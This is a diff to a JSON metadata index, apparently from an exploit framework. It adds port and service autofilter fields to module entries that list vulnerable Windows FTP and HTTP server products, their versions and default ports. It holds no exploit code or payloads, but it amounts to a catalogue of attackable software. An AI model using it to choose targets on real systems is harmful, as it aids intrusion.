"autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Bisonware FTP Server / Windows XP SP3 EN" ], @@ -77238,6 +100351,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows 2000 Pro SP4 French", @@ -77276,6 +100396,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3 - English", @@ -77312,6 +100438,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Dream FTP Server v1.02 Universal" ], @@ -77345,6 +100477,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro English ALL", "Windows XP Pro SP0/SP1 English" @@ -77382,6 +100521,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows Universal - v1.7.0.2", "Windows Universal - v1.7.0.3", @@ -77426,6 +100572,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 - Version 2002" ], @@ -77460,6 +100613,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows Universal - v1.7.0.2", "Windows Universal - v1.7.0.3", @@ -77502,6 +100662,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2k Server SP4 English", "Windows XP Pro SP2 Italian" @@ -77536,6 +100703,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -77569,6 +100742,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "FreeFloat / Windows XP SP3" ], @@ -77602,6 +100782,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "FreeFloat" ], @@ -77636,6 +100823,13 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "freeFTPd 1.0.10 and below on Windows Desktop Version" ], @@ -77669,6 +100863,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 English ALL", @@ -77706,6 +100907,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77738,6 +100945,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Professional, English - shlwapi 6.00.2900.5912", "XP SP3 Professional, German - shlwapi 6.00.2900.5912", @@ -77772,6 +100985,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -77805,6 +101024,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -77837,6 +101062,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -77870,6 +101101,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -77905,6 +101142,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "GlobalSCAPE Secure FTP Server <= 3.0.2 Universal" ], @@ -77941,6 +101185,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows XP Pro SP3", @@ -77976,6 +101227,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "httpdx 1.4 - Windows XP SP3 English", @@ -78014,6 +101272,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 7 SP1 x86" ], @@ -78047,6 +101312,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -78080,6 +101351,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -78114,6 +101391,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal LeapFTP.exe", "Windows 2000 SP0/4 English", @@ -78152,6 +101435,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 SP4 English/Italian (IIS 5.0)", "Windows 2000 SP3 English (IIS 5.0)", @@ -78188,6 +101478,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "NetTerm NetFTPD Universal", "Windows 2000 English", @@ -78225,6 +101522,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP SP3 Universal" ], @@ -78259,6 +101562,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Open&Compact FTP 1.2 on Windows (Before Vista)" ], @@ -78293,6 +101603,13 @@ "platform": "Windows", "arch": "", "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -78328,6 +101645,13 @@ "platform": "Windows", "arch": "", "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -78362,6 +101686,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 English" ], @@ -78396,6 +101727,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3 English" ], @@ -78429,6 +101767,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -78464,6 +101808,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "QuickShare File Server 1.2.1" ], @@ -78499,6 +101850,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP3" ], @@ -78533,6 +101891,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Sami FTP Server 2.0.1 / Windows XP SP3" ], @@ -78574,6 +101939,12 @@ "platform": "Windows", "arch": "x86", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro All - English", @@ -78611,6 +101982,13 @@ "platform": "Windows", "arch": "x86", "rport": 5554, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows XP SP0", "Windows XP SP1" @@ -78648,6 +102026,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows Vista" ], @@ -78680,6 +102064,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XP Universal" ], @@ -78713,6 +102103,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 SP0-4 EN", "Windows XP SP0-1 EN" @@ -78748,6 +102145,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Serv-U Uber-Leet Universal ServUDaemon.exe", "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", @@ -78783,6 +102187,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "SlimFTPd Server <= 3.16 Universal" ], @@ -78817,6 +102228,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -78852,6 +102269,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows Universal TurboFtp 1.30.823", @@ -78886,6 +102310,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "vftpd 1.31 - Windows XP SP3 English" @@ -78920,6 +102351,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000" ], @@ -78953,6 +102391,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic", "Windows 2000 SP0-SP4 English", @@ -78990,6 +102435,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP1 English", @@ -79025,6 +102477,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -79056,6 +102514,21 @@ "platform": "Windows", "arch": "x86", "rport": 5466, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows VBS Stager" ], @@ -79090,6 +102563,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "WS-FTP Server 5.03 Universal" ], @@ -79123,6 +102603,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -79158,6 +102645,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -79191,6 +102684,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English", "Windows 2000 SP4 English" @@ -79225,6 +102724,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Omni-NFS Enterprise V5.2" ], @@ -79259,6 +102765,12 @@ "platform": "Windows", "arch": "", "rport": 12203, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Medal Of Honor Allied Assault v 1.0 Universal" ], @@ -79293,6 +102805,12 @@ "platform": "Windows", "arch": "", "rport": 26000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Fmodex.dll - Universal", "Win XP SP2 English", @@ -79328,6 +102846,12 @@ "platform": "Windows", "arch": "", "rport": 7787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "UT2004 Build 3186" ], @@ -79362,6 +102886,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -79395,6 +102934,21 @@ "platform": "Windows", "arch": "", "rport": 4000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "SecurityGateway 1.0.1 Universal" @@ -79430,6 +102984,21 @@ "platform": "Windows", "arch": "", "rport": 1000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "WebAdmin 2.0.4 Universal", @@ -79467,6 +103036,12 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro All - English" ], @@ -79501,6 +103076,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Generic Bruteforce", "Apache.org Build 1.3.9->1.3.19", @@ -79550,6 +103140,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -79584,6 +103189,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" ], @@ -79620,6 +103231,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" ], @@ -79653,6 +103279,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BadBlue 2.5 (Universal)" ], @@ -79686,6 +103327,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BadBlue EE 2.7 Universal", "BadBlue 2.72b Universal" @@ -79719,6 +103375,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Apache 2.2 - WebLogic module version 1.0.1136334", "Windows Apache 2.2 - WebLogic module version 1.0.1150354" @@ -79754,6 +103416,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", @@ -79789,6 +103466,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Apache 2.2 version Universal" ], @@ -79822,6 +103514,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 English" ], @@ -79856,6 +103563,21 @@ "platform": "Windows", "arch": "", "rport": 8014, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -79891,6 +103613,12 @@ "platform": "Windows", "arch": "", "rport": 5250, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iGateway 3.0.40621.0" ], @@ -79924,6 +103652,21 @@ "platform": "Windows", "arch": "", "rport": 34443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -79958,6 +103701,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cogent DataHub < 7.3.5" ], @@ -79994,6 +103752,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 English / Cogent DataHub 7.3.0" ], @@ -80026,6 +103799,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -80059,6 +103847,21 @@ "platform": "Windows", "arch": "", "rport": 7879, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cyclope Employee Surveillance Solution v6.2 or older" ], @@ -80093,6 +103896,21 @@ "platform": "Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Desktop Central v7 - v8 build 80292 / Windows" ], @@ -80126,6 +103944,21 @@ "platform": "Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Desktop Central v7 to v9 build 90054 / Windows" ], @@ -80158,6 +103991,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Pulse Enterprise 9.0.34" ], @@ -80190,6 +104038,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Pulse Enterprise 9.9.16" ], @@ -80225,6 +104088,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "DiskBoss Enterprise v7.4.28", @@ -80261,6 +104139,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "DiskSavvy Enterprise v9.1.14", @@ -80294,6 +104187,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Disk Sorter Enterprise v9.5.12" ], @@ -80327,6 +104235,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dup Scout Enterprise 10.0.18" ], @@ -80359,6 +104282,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dup Scout Enterprise v9.5.14" ], @@ -80391,6 +104329,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Easy Chat Server 2.0 to 3.1" ], @@ -80423,6 +104376,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Easy File Sharing 7.2 HTTP" ], @@ -80454,6 +104413,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Easy File Sharing 7.2 HTTP" ], @@ -80487,6 +104452,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 - Easy FTP Server Universal" ], @@ -80520,6 +104500,12 @@ "platform": "Windows", "arch": "", "rport": 8028, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell eDirectory 8.8.1" ], @@ -80554,6 +104540,21 @@ "platform": "Windows", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows (ALL) - eDirectory 8.7.3 iMonitor" ], @@ -80589,6 +104590,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Easy Chat Server 2.0", @@ -80629,6 +104645,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Efmws 5.3 Universal", @@ -80667,6 +104698,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / Ektron CMS400 8.02" ], @@ -80700,6 +104746,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2008 R2 / Ektron CMS400 8.5" ], @@ -80735,6 +104796,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" ], @@ -80769,6 +104845,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" ], @@ -80801,6 +104883,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Free Download Manager 2.5 Build 758" ], @@ -80832,6 +104929,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows x86", "Windows x64" @@ -80867,6 +104979,12 @@ "platform": "Windows", "arch": "", "rport": 13003, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "GCore 1.3.8.42, Windows x64 (Win7+)", @@ -80904,6 +105022,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -80939,6 +105072,21 @@ "platform": "Java", "arch": "java", "rport": 5814, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", @@ -80978,6 +105126,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" ], @@ -81014,6 +105177,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Intelligent Management Center 5.1 E0202 / Windows" ], @@ -81050,6 +105228,21 @@ "platform": "Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP LoadRunner 11.52" ], @@ -81086,6 +105279,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" ], @@ -81118,6 +105326,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81151,6 +105374,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81184,6 +105422,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50", "HP OpenView Network Node Manager 7.53" @@ -81219,6 +105472,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP NNM 7.53 Windows Server 2003 Enterprise", @@ -81254,6 +105522,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NNM 7.53 - Windows Server 2003 Ent" ], @@ -81287,6 +105570,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81322,6 +105611,21 @@ 